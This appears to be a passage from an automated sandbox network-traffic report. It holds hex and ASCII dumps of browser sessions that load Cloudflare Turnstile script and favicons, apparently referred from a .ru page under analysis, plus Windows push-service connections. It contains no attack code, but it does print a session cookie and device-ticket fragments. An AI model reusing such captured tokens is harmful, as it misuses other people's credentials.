                                                                          2025-03-04 17:25:12 UTC1369INData Raw: 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 5f 29 7d 76 61 72 20 53 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 61 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 43 65 2e 46 61 69 6c 75 72 65 46 65 65 64 62 61 63 6b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 43 65 2e 46 61 69 6c 75 72 65 48 61 76 69 6e 67 54 72 6f 75 62 6c 65 73 2c 6c 2c 76 3d 4c 28 4d 72 2c 28 6c 3d 28 74 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c
                                                                          Data Ascii: language,"/").concat(_)}var St=function(e){var t,a,o=window.innerWidth<400,c=e.state===Ce.FailureFeedback||e.state===Ce.FailureHavingTroubles,l,v=L(Mr,(l=(t=e.displayLanguage)===null||t===void 0?void 0:t.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),
                                                                          2025-03-04 17:25:12 UTC1369INData Raw: 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 4f 65 28 65 2c 74 2c 61 29 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 4f 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 4f 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 76 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 6c 29 3b 76 61 72 20 73 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 73 3b 72 65 74 75 72 6e 20 76 26 26 74 65 28 70 2c 76 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 4f 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61
                                                                          Data Ascii: l(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Oe(e,t,a){return Be()?Oe=Reflect.construct:Oe=function(c,l,v){var h=[null];h.push.apply(h,l);var s=Function.bind.apply(c,h),p=new s;return v&&te(p,v.prototype),p},Oe.apply(null,a
                                                                          2025-03-04 17:25:12 UTC1369INData Raw: 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 66 72 28 61 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 58 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 71 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 71 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 24 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 71 65 29 2e 63 6f 6e 63 61 74
                                                                          Data Ascii: r));function g(e,t){var a="[Cloudflare Turnstile] ".concat(e,".");throw new fr(a,t)}function x(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function Xe(e){return e.startsWith(qe)?e.substring(qe.length):null}function $(e){return"".concat(qe).concat
                                                                          2025-03-04 17:25:12 UTC1369INData Raw: 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 73 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 73 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69
                                                                          Data Ascii: height="100vh",s.style.top="0",s.style.left="0",s.style.transformOrigin="center center",s.style.overflowX="hidden",s.style.overflowY="auto",s.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verti


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.649740104.16.2.1894437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:12 UTC596OUTGET /favicon.png HTTP/1.1
                                                                          Host: developers.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://1c.hypernesdt.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-03-04 17:25:12 UTC718INHTTP/1.1 200 OK
                                                                          Date: Tue, 04 Mar 2025 17:25:12 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 937
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                          ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                                                          Set-Cookie: __cf_bm=VZV49D3W6wQC1rCj8snQ3H0ipeFWSkR5aq5oyjEKZQo-1741109112-1.0.1.1-NRrKqpZTiKKQzGc.gJms_lY6KGAV_.oys1ECr1fzqtZKSExV3j0nCAcgUga2c5j3OE2KL3VYHXyaDPQdcpukmgrvyuMyl7zk1GKSK9oE0xE; path=/; expires=Tue, 04-Mar-25 17:55:12 GMT; domain=.developers.cloudflare.com; HttpOnly; Secure; SameSite=None
                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                          X-Content-Type-Options: nosniff
                                                                          access-control-allow-origin: *
                                                                          Server: cloudflare
                                                                          CF-RAY: 91b3124fbf5ca0f4-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-03-04 17:25:12 UTC651INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                                                          Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6
                                                                          2025-03-04 17:25:12 UTC286INData Raw: ee 39 df 2c 85 85 09 69 c6 04 d7 c0 65 d0 03 c2 20 04 ce 80 13 a0 09 1c 01 87 e4 9b b0 01 bd 5f 93 b5 e8 ca 40 13 68 01 2f 84 89 fb c2 c4 2e 16 2f 55 32 4e 64 f5 92 e4 8b e6 07 f8 2e f9 a6 f0 55 f2 05 7c 06 9f c0 7b d0 28 16 da cd ad 79 10 09 81 d7 60 0c 7c 04 e3 dc 02 7a 5c cd 06 7a d9 40 0b 6f 35 18 88 e1 2d 98 94 0b 4f f4 54 c6 54 4c 29 af 35 17 1d ce 79 b1 6d 0d 9d ab 96 0f 81 01 7a 5a e3 94 7f d8 81 b3 c7 bc c5 8b 12 f1 3a 1b b8 42 97 8a 69 0a e5 8e 77 ce 82 d2 eb 3f 21 0c f0 f6 6d 2d 78 69 f5 95 1f a6 e7 3b 9c 9e 0f 65 0c 30 c9 41 cc e1 1c 57 c7 7d bf ef 45 a6 b5 88 75 ff 0a ee e7 c8 cf 68 30 4f ad 2f c5 de df 82 55 df 00 6a 41 1d c4 ea 2c 20 a2 f3 7b 0f 28 fc ff 7f b1 f8 dd cf 5f 3d fe 77 23 bf 7e 8b c6 3c bd c1 67 0f 56 7a 91 a9 c6 c8 6f 40 1a 65
                                                                          Data Ascii: 9,ie _@h/./U2Nd.U|{(y`|z\z@o5-OTTL)5ymzZ:Biw?!m-xi;e0AW}Euh0O/UjA, {(_=w#~<gVzo@e


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.649746104.16.2.1894437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:12 UTC548OUTGET /favicon.png HTTP/1.1
                                                                          Host: developers.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __cf_bm=VZV49D3W6wQC1rCj8snQ3H0ipeFWSkR5aq5oyjEKZQo-1741109112-1.0.1.1-NRrKqpZTiKKQzGc.gJms_lY6KGAV_.oys1ECr1fzqtZKSExV3j0nCAcgUga2c5j3OE2KL3VYHXyaDPQdcpukmgrvyuMyl7zk1GKSK9oE0xE
                                                                          2025-03-04 17:25:13 UTC413INHTTP/1.1 200 OK
                                                                          Date: Tue, 04 Mar 2025 17:25:13 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 937
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=0, must-revalidate
                                                                          ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                          X-Content-Type-Options: nosniff
                                                                          access-control-allow-origin: *
                                                                          Server: cloudflare
                                                                          CF-RAY: 91b3125438b64e4d-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-03-04 17:25:13 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                                                          Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          13192.168.2.64986840.113.110.67443
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:32 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6b 2f 41 57 39 4a 44 30 48 6b 32 30 4f 7a 6a 62 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 32 35 63 61 39 36 64 39 39 66 63 63 32 33 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: k/AW9JD0Hk20Ozjb.1Context: 8d25ca96d99fcc23
                                                                          2025-03-04 17:25:32 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2025-03-04 17:25:32 UTC1384OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 33 36 31 0d 0a 4d 53 2d 43 56 3a 20 6b 2f 41 57 39 4a 44 30 48 6b 32 30 4f 7a 6a 62 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 32 35 63 61 39 36 64 39 39 66 63 63 32 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 59 41 2b 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 55 65 4f 6f 45 75 6c 59 66 70 79 71 2b 46 2b 4d 62 77 51 2f 70 7a 47 61 58 39 36 66 51 71 56 47 77 2b 30 74 61 47 77 33 54 37 30 4c 36 56 47 56 72 75 4a 75 78 31 2b 38 53 59 36 4d 4f 45 30 36 37 77 34 38 66 65 45 59 7a 77 4a 5a 48 41 56 44 45 35 70 55 62 44 70 4b 45 31 38 64 66 79 37 39 4f 36 38 49 43 51 51 47 42 43 6d 76
                                                                          Data Ascii: ATH 2 CON\DEVICE 1361MS-CV: k/AW9JD0Hk20Ozjb.2Context: 8d25ca96d99fcc23<device><compact-ticket>t=EwCYA+pIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZUeOoEulYfpyq+F+MbwQ/pzGaX96fQqVGw+0taGw3T70L6VGVruJux1+8SY6MOE067w48feEYzwJZHAVDE5pUbDpKE18dfy79O68ICQQGBCmv
                                                                          2025-03-04 17:25:32 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6b 2f 41 57 39 4a 44 30 48 6b 32 30 4f 7a 6a 62 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 32 35 63 61 39 36 64 39 39 66 63 63 32 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: k/AW9JD0Hk20Ozjb.3Context: 8d25ca96d99fcc23<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2025-03-04 17:25:33 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2025-03-04 17:25:33 UTC58INData Raw: 4d 53 2d 43 56 3a 20 55 6e 46 59 5a 49 6e 6e 45 30 57 41 6c 72 79 79 61 7a 41 7a 43 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: UnFYZInnE0WAlryyazAzCA.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          14192.168.2.65003740.115.3.253443
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:58 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 36 73 49 64 53 4a 70 5a 45 79 77 74 37 41 2f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 30 66 37 63 30 38 37 63 35 33 63 37 33 31 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 305MS-CV: a6sIdSJpZEywt7A/.1Context: da0f7c087c53c731
                                                                          2025-03-04 17:25:58 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2025-03-04 17:25:58 UTC1384OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 33 36 31 0d 0a 4d 53 2d 43 56 3a 20 61 36 73 49 64 53 4a 70 5a 45 79 77 74 37 41 2f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 30 66 37 63 30 38 37 63 35 33 63 37 33 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 59 41 2b 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 55 65 4f 6f 45 75 6c 59 66 70 79 71 2b 46 2b 4d 62 77 51 2f 70 7a 47 61 58 39 36 66 51 71 56 47 77 2b 30 74 61 47 77 33 54 37 30 4c 36 56 47 56 72 75 4a 75 78 31 2b 38 53 59 36 4d 4f 45 30 36 37 77 34 38 66 65 45 59 7a 77 4a 5a 48 41 56 44 45 35 70 55 62 44 70 4b 45 31 38 64 66 79 37 39 4f 36 38 49 43 51 51 47 42 43 6d 76
                                                                          Data Ascii: ATH 2 CON\DEVICE 1361MS-CV: a6sIdSJpZEywt7A/.2Context: da0f7c087c53c731<device><compact-ticket>t=EwCYA+pIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZUeOoEulYfpyq+F+MbwQ/pzGaX96fQqVGw+0taGw3T70L6VGVruJux1+8SY6MOE067w48feEYzwJZHAVDE5pUbDpKE18dfy79O68ICQQGBCmv
                                                                          2025-03-04 17:25:58 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 61 36 73 49 64 53 4a 70 5a 45 79 77 74 37 41 2f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 30 66 37 63 30 38 37 63 35 33 63 37 33 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: a6sIdSJpZEywt7A/.3Context: da0f7c087c53c731<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                          2025-03-04 17:25:58 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                          Data Ascii: 202 1 CON 58
                                                                          2025-03-04 17:25:58 UTC58INData Raw: 4d 53 2d 43 56 3a 20 76 51 6e 4d 43 34 74 6c 73 55 61 4c 66 6f 2f 56 48 33 33 6a 34 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                          Data Ascii: MS-CV: vQnMC4tlsUaLfo/VH33j4g.0Payload parsing failed.


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          15192.168.2.65004140.115.3.253443
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:26:31 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 78 76 45 33 69 6c 44 7a 75 30 4f 2f 2f 72 41 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 62 33 61 64 62 63 37 66 34 63 37 32 33 0d 0a 0d 0a
                                                                          Data Ascii: CNT 1 CON 304MS-CV: xvE3ilDzu0O//rAl.1Context: 8db3adbc7f4c723
                                                                          2025-03-04 17:26:31 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                          2025-03-04 17:26:31 UTC1383OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 33 36 30 0d 0a 4d 53 2d 43 56 3a 20 78 76 45 33 69 6c 44 7a 75 30 4f 2f 2f 72 41 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 64 62 33 61 64 62 63 37 66 34 63 37 32 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 59 41 2b 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 55 65 4f 6f 45 75 6c 59 66 70 79 71 2b 46 2b 4d 62 77 51 2f 70 7a 47 61 58 39 36 66 51 71 56 47 77 2b 30 74 61 47 77 33 54 37 30 4c 36 56 47 56 72 75 4a 75 78 31 2b 38 53 59 36 4d 4f 45 30 36 37 77 34 38 66 65 45 59 7a 77 4a 5a 48 41 56 44 45 35 70 55 62 44 70 4b 45 31 38 64 66 79 37 39 4f 36 38 49 43 51 51 47 42 43 6d 76 62
